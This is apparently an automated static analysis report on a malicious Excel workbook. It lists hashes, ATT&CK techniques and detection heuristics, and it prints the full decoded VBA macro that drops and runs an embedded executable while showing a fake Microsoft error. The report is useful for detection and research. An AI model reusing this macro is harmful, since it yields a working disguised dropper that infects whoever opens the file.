Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 9ada5095fc3219dc…

MALICIOUS

Office (OLE) / .XLSX

1.36 MB Created: 2020-02-07 11:26:50 Authoring application: Microsoft Excel First seen: 2022-08-05
MD5: 4632ec6deddc4113c9e3c9b0f9a19c12 SHA-1: 8429ce8d8b06518c27a54ece1bd3245bf3dabc51 SHA-256: 9ada5095fc3219dc91c9141f1c4918a9a32943bf8830cbc1e3ecc9cd218d6ae7
176 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open VBA macro is designed to execute upon opening the Excel file. It constructs a path in the APPDATA directory, writes a zip file containing a payload (represented by concatenated bytes), and then uses 'Shell.Application' to extract and execute the payload as a .exe file. The macro also displays a fake error message to the user. The execution of the payload is a critical step in the attack chain.

Heuristics 6

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oApp = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
     Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    folder_name = Environ$("APPDATA") & "\"

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2911 bytes
SHA-256: fd33eb39e6cdaba21e08b3cb7ad42f38c7e0fe913ced164adb5f34a8d1465bb7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Sub Workbook_Open()

hola
End Sub

 Sub unzipper(zFname As Variant, eFname As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
     
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(eFname).CopyHere oApp.Namespace(zFname).items
    
   
End Sub


Sub hola()

Dim path_file As String

Dim file_name As String

Dim folder_name As Variant

Dim byt() As Byte

Dim ar1Gohra() As String


file_name = "WindowsSecurity"

folder_name = Environ$("APPDATA") & "\"

If Dir(folder_name, vbDirectory) = "" Then
MkDir (folder_name)
End If


path_file = folder_name & file_name

Dim linGohra As Double

linGohra = 0
Dim liar As Integer

liar = 0

Dim btsGohra7(361128) As Byte
ar1Gohra = Split(UserForm1.TextBox1.Text, "-")

For Each vl In ar1Gohra
btsGohra7(linGohra) = CByte(vl)
linGohra = linGohra + 1
Next


Open path_file & ".zip" For Binary Access Write As #3
Put #3, , btsGohra7
Close #3




If Dir(folder_name & file_name & ".e" & "xe") = "" Then
unzipper folder_name & file_name & ".zip", folder_name
End If

 Dim a As String
a = MsgBox("Microsoft Office Excel: This Version isn't Compatible with This file.", vbCritical, "Microsoft Error")


Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus


End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1431F97C-471B-4F10-9B03-8ECA78809132}{33DA1254-85A2-467D-A205-17541BE63550}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: MBD010F1B0C/Ole10Native 71968 bytes
SHA-256: 361f1ff9aa84c59fa8f8a14f734d7b2bc602ae6f126bd5284d0672dda7be072a

Open this report in the interactive analyzer, or submit your own file for analysis.